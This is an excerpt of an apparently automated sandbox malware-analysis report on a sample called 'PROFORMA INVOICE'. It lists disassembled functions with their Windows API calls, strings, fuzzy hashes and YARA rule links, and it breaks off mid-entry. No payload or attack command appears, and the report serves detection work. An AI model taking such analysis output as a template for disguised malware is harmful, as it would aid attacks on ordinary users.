Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: e88ce5d550cad8c68e73973689cedf522e6eec52d49d6ce075de5e350ef24ac5
Instruction ID: 0d102466b0ee324ed52a5862cf285647a2befb21682df9d67cd86b799dd25afd
Opcode Fuzzy Hash: e88ce5d550cad8c68e73973689cedf522e6eec52d49d6ce075de5e350ef24ac5
Instruction Fuzzy Hash: F261A2B1900289AFDF20CF68DC84AAE7BB8FB82314F140159F451A7295D7B5BD05EB21

Function 00FC9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FC9C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FC9C9B
GetWindowLongW.USER32(?,000000F0), ref: 00FC9CBF
_memset.LIBCMT ref: 00FC9CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FC9CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FC9D5A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 35af5833f5572adfe6537319eac6b74f77e2bd546ec464df3e7fff6805eb4b55
Instruction ID: 4fbf4e049cfd18e6bdfed10a4d9b8f41c8f44e556fec7c99657b473f7a82bcda
Opcode Fuzzy Hash: 35af5833f5572adfe6537319eac6b74f77e2bd546ec464df3e7fff6805eb4b55
Instruction Fuzzy Hash: EB618B75900209AFDB20DFA8CD86FEE77B8EB09714F100159FA55A7291C7B4AD41EB60

Function 00F994E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00F994FE
SafeArrayAllocData.OLEAUT32(?), ref: 00F99549
VariantInit.OLEAUT32(?), ref: 00F9955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 00F9957B
VariantCopy.OLEAUT32(?,?), ref: 00F995BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 00F995D2
VariantClear.OLEAUT32(?), ref: 00F995E7
SafeArrayDestroyData.OLEAUT32(?), ref: 00F995F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F995FD
VariantClear.OLEAUT32(?), ref: 00F9960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F9961A

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 5a2be08ce202821f17cef754c9668c2bd995492891eff42f31ed53e0d560a4d8
Instruction ID: 7b941de65d13dc8946e6a51721a3900e0ed4c3b8846aad82d34be374c31631fb
Opcode Fuzzy Hash: 5a2be08ce202821f17cef754c9668c2bd995492891eff42f31ed53e0d560a4d8
Instruction Fuzzy Hash: 37415C3190021DAFDF01DFA8DC849DEBBB9EF18354F018069E501A7251DB75EA45EBA1

Function 00FBADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

CoInitialize.OLE32 ref: 00FBADF6
CoUninitialize.OLE32 ref: 00FBAE01
CoCreateInstance.OLE32(?,00000000,00000017,00FED8FC,?), ref: 00FBAE61
IIDFromString.OLE32(?,?), ref: 00FBAED4
VariantInit.OLEAUT32(?), ref: 00FBAF6E
VariantClear.OLEAUT32(?), ref: 00FBAFCF

Strings

NULL Pointer assignment, xrefs: 00FBAEA6
Failed to create object, xrefs: 00FBAE6C, 00FBAF22
Invalid parameter, xrefs: 00FBAEED

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 9409eb3013af95d5c942e7919e62b83532e8e2dccb9c2204dc1d464389ae9652
Instruction ID: b7935c18453a231a41ccca8f95f30227c1167dd0f5107bab988f9fa026b0db50
Opcode Fuzzy Hash: 9409eb3013af95d5c942e7919e62b83532e8e2dccb9c2204dc1d464389ae9652
Instruction Fuzzy Hash: C561AC71608301AFD711DF56C889BAABBE8AF88710F04481DF9859B291C774ED44EF93

Function 00FB8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00FB8168
inet_addr.WSOCK32(?,?,?), ref: 00FB81AD
gethostbyname.WSOCK32(?), ref: 00FB81B9
IcmpCreateFile.IPHLPAPI ref: 00FB81C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FB8237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FB824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00FB82C2
WSACleanup.WSOCK32 ref: 00FB82C8

Strings

Ping, xrefs: 00FB81EB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: c8d186916764a4103b220013f2ceafd59ce5ada9878ff0173dbc5946c364386a
Instruction ID: 24c9974d1e938233bd8ddd52058d1e9f18853687da02c62edff4f841850ebf49
Opcode Fuzzy Hash: c8d186916764a4103b220013f2ceafd59ce5ada9878ff0173dbc5946c364386a
Instruction Fuzzy Hash: 565182316046009FD710AF65CC85B6A77E8FF88360F048969F955DB2A1DB74E801EF42

Function 00FC9E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FC9E5B
CreateMenu.USER32 ref: 00FC9E76
SetMenu.USER32(?,00000000), ref: 00FC9E85
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FC9F12
IsMenu.USER32(?), ref: 00FC9F28
CreatePopupMenu.USER32 ref: 00FC9F32
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FC9F63
DrawMenuBar.USER32 ref: 00FC9F71

Strings

0, xrefs: 00FC9E54

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0
API String ID: 176399719-4108050209
Opcode ID: a7fc3c6dff3f8c97c1bc17765eaa43dd743ba5319eb96f014f4904104b9b4c0c
Instruction ID: f1dabf6958a1e58b9e5ffd18ef9bf4eb048fecbdd376cd0f1c025ac64f09d894
Opcode Fuzzy Hash: a7fc3c6dff3f8c97c1bc17765eaa43dd743ba5319eb96f014f4904104b9b4c0c
Instruction Fuzzy Hash: 46414679A0020AAFDB20DF64D989FAABBB5FF49314F14402CE945AB350D771A914EF50

Function 00FAE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FAE396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FAE40C
GetLastError.KERNEL32 ref: 00FAE416
SetErrorMode.KERNEL32(00000000,READY), ref: 00FAE483

Strings

READY, xrefs: 00FAE45C
INVALID, xrefs: 00FAE455
READONLY, xrefs: 00FAE44E
UNKNOWN, xrefs: 00FAE43B
NOTREADY, xrefs: 00FAE442

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 603c352fb81f6369d0b5955d7fc55143eec6576c4806ea0b36ce32e47d62b924
Instruction ID: b23eaa9bf3764c52e66e3f697cafc4a07d77305eebb402fcbf1a7dbe0164842f
Opcode Fuzzy Hash: 603c352fb81f6369d0b5955d7fc55143eec6576c4806ea0b36ce32e47d62b924
Instruction Fuzzy Hash: D831C4B9A002099FDB00EF68CC85BBDBBB8FF0A314F148015E945DB291DB759901EB91

Function 00F9B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F9B98C
GetDlgCtrlID.USER32 ref: 00F9B997
GetParent.USER32 ref: 00F9B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F9B9B6
GetDlgCtrlID.USER32(?), ref: 00F9B9BF
GetParent.USER32(?), ref: 00F9B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 00F9B9DE

Strings

ComboBox, xrefs: 00F9B911
ListBox, xrefs: 00F9B949

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 4d6420bc527f3acfba543c38f5ae6ac2536220930c2cce323abc6e0bfc77fe0b
Instruction ID: 81ca6553417884fa289f37b7caf20a0522efc5ca6c7a6d181fb0bc2813fb7bf4
Opcode Fuzzy Hash: 4d6420bc527f3acfba543c38f5ae6ac2536220930c2cce323abc6e0bfc77fe0b
Instruction Fuzzy Hash: FF21F575900108BFDF05ABA4DCC6EFEBB75EF49310F100119F6A1972A1DB795815EB60

Function 00F9B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F9BA73
GetDlgCtrlID.USER32 ref: 00F9BA7E
GetParent.USER32 ref: 00F9BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F9BA9D
GetDlgCtrlID.USER32(?), ref: 00F9BAA6
GetParent.USER32(?), ref: 00F9BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 00F9BAC5

Strings

ComboBox, xrefs: 00F9B9FA
ListBox, xrefs: 00F9BA32

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 4a9590fac032f62e4248467d1a60a7d26cd4eede3e190f4a9e7eca8745941b63
Instruction ID: 09784e76a515aafb07c711c17bc3f0c6ada34658e6c723be71af844b88aee0a0
Opcode Fuzzy Hash: 4a9590fac032f62e4248467d1a60a7d26cd4eede3e190f4a9e7eca8745941b63
Instruction Fuzzy Hash: 0C21C2B5A00108BFEF00ABA4DC85EFEBB79EF45300F140019F991A7191DBBD5919BB60

Function 00F9BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00F9BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 00F9BAF8
_wcscmp.LIBCMT ref: 00F9BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F9BB85

Strings

list, xrefs: 00F9BB67
SHELLDLL_DefView, xrefs: 00F9BB04
largeicons, xrefs: 00F9BB19
details, xrefs: 00F9BB33
smallicons, xrefs: 00F9BB4D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: c8f6baac64c35bef171e3dc72b3cf8bcfd6b3ac207ca3592dd1fe76819d8a903
Instruction ID: 368c2794a39c149a5bfd6022f0908c8f877fd4813c29023c3c0ff6744db8673a
Opcode Fuzzy Hash: c8f6baac64c35bef171e3dc72b3cf8bcfd6b3ac207ca3592dd1fe76819d8a903
Instruction Fuzzy Hash: 5C110677A48307FAFE247A21FD07DA6379CDB91738B200026FA04E84D9EFA968517614

Function 00FBB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FBB2D5
CoInitialize.OLE32(00000000), ref: 00FBB302
CoUninitialize.OLE32 ref: 00FBB30C
GetRunningObjectTable.OLE32(00000000,?), ref: 00FBB40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 00FBB539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00FBB56D
CoGetObject.OLE32(?,00000000,00FED91C,?), ref: 00FBB590
SetErrorMode.KERNEL32(00000000), ref: 00FBB5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FBB623
VariantClear.OLEAUT32(00FED91C), ref: 00FBB633

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 6c0bec46c4e0e8a5b1ec9b3b99bd6d10a98aa1d5958b7facc4db5151a6fcd353
Instruction ID: a54a1f90e4d9692d2f38a9739a30f65ae5d1f1a32373dece5f452380108b2285
Opcode Fuzzy Hash: 6c0bec46c4e0e8a5b1ec9b3b99bd6d10a98aa1d5958b7facc4db5151a6fcd353
Instruction Fuzzy Hash: 6FC122B1608305AFC700DF6AC884A6BB7E9FF88308F04495DF58A9B251DBB1ED05DB52

Function 00FA67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00FA67FD
__swprintf.LIBCMT ref: 00FA680A

Part of subcall function 00F8172B: __woutput_l.LIBCMT ref: 00F81784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00FA6834
LoadResource.KERNEL32(?,00000000), ref: 00FA6840
LockResource.KERNEL32(00000000), ref: 00FA684D
FindResourceW.KERNEL32(?,?,00000003), ref: 00FA686D
LoadResource.KERNEL32(?,00000000), ref: 00FA687F
SizeofResource.KERNEL32(?,00000000), ref: 00FA688E
LockResource.KERNEL32(?), ref: 00FA689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00FA68F9

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: ec912f901b9242c28f93eb8c3c13b90c6342c738294c9f1cf9c8e0ac35d8de82
Instruction ID: 526e684bbbbb2e5c0d6a63da7ae2fd9ab518d23f6748210e02acc5d81da56790
Opcode Fuzzy Hash: ec912f901b9242c28f93eb8c3c13b90c6342c738294c9f1cf9c8e0ac35d8de82
Instruction Fuzzy Hash: 3E3170B1A0025AABDB119F60DD85ABF7BACFF09354F148425F912D6140E778D911EB60

Function 00FA4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FA4047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FA30A5,?,00000001), ref: 00FA405B
GetWindowThreadProcessId.USER32(00000000), ref: 00FA4062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FA30A5,?,00000001), ref: 00FA4071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA4083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00FA30A5,?,00000001), ref: 00FA409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FA30A5,?,00000001), ref: 00FA40AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FA30A5,?,00000001), ref: 00FA40F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00FA30A5,?,00000001), ref: 00FA4108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00FA30A5,?,00000001), ref: 00FA4113

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: cd52a708d89c2276aad21ebe8dc3e0208eb4e4889c4391427fb558bef3e1442b
Instruction ID: cf16be14564f493ac091834658daab69a27f8273cf13a7fe1ed50549f92257ac
Opcode Fuzzy Hash: cd52a708d89c2276aad21ebe8dc3e0208eb4e4889c4391427fb558bef3e1442b
Instruction Fuzzy Hash: 6731A7B1900208AFDB31DF55DC85B6977A9BFA5321F20801AF905DB644C7FAEC40AF60

Function 00FDDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00F7B496
SetTextColor.GDI32(?,000000FF), ref: 00F7B4A0
SetBkMode.GDI32(?,00000001), ref: 00F7B4B5
GetStockObject.GDI32(00000005), ref: 00F7B4BD
GetClientRect.USER32(?), ref: 00FDDD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 00FDDD7A
GetWindowDC.USER32(?), ref: 00FDDD86
GetPixel.GDI32(00000000,?,?), ref: 00FDDD95
ReleaseDC.USER32(?,00000000), ref: 00FDDDA7
GetSysColor.USER32(00000005), ref: 00FDDDC5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: d7aa40893ee918d933ff9111a147eaef83f775539e2a3042f734de1ca3e9974e
Instruction ID: 2202e2647996e6f2c24d212d76fb13cc100bdf1cc1ae9bd7ebcd8d35281cb957
Opcode Fuzzy Hash: d7aa40893ee918d933ff9111a147eaef83f775539e2a3042f734de1ca3e9974e
Instruction Fuzzy Hash: CB118131500249EFDB216F64EC88BA93B76EB05331F148626FA6A990E1CB720941FF11

Function 00F9CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00F9CF50), ref: 00F9CE90

Strings

NAME, xrefs: 00F9CCC2
CLASS, xrefs: 00F9CC10
REGEXPCLASS, xrefs: 00F9CC56
INSTANCE, xrefs: 00F9CD9E
CLASSNN, xrefs: 00F9CC33
TEXT, xrefs: 00F9CDC7

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: c3a0e233c3bb35c6caadc709b728f1df0e76e6d54b0a3d15c669179ecfb3446c
Instruction ID: a57a1c8f9122e034ad6421b68502882a8425b2891e2aecf74564ee84aea2c251
Opcode Fuzzy Hash: c3a0e233c3bb35c6caadc709b728f1df0e76e6d54b0a3d15c669179ecfb3446c
Instruction Fuzzy Hash: 7291B731A00506ABEF19EF60C881BEAFB79BF04310F50855AE45EA7151DF34695AFBD0

Function 00F63093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F630DC
CoUninitialize.OLE32(?,00000000), ref: 00F63181
UnregisterHotKey.USER32(?), ref: 00F632A9
DestroyWindow.USER32(?), ref: 00FD5079
FreeLibrary.KERNEL32(?), ref: 00FD50F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD5125

Strings

close all, xrefs: 00F630D7

Memory Dump Source

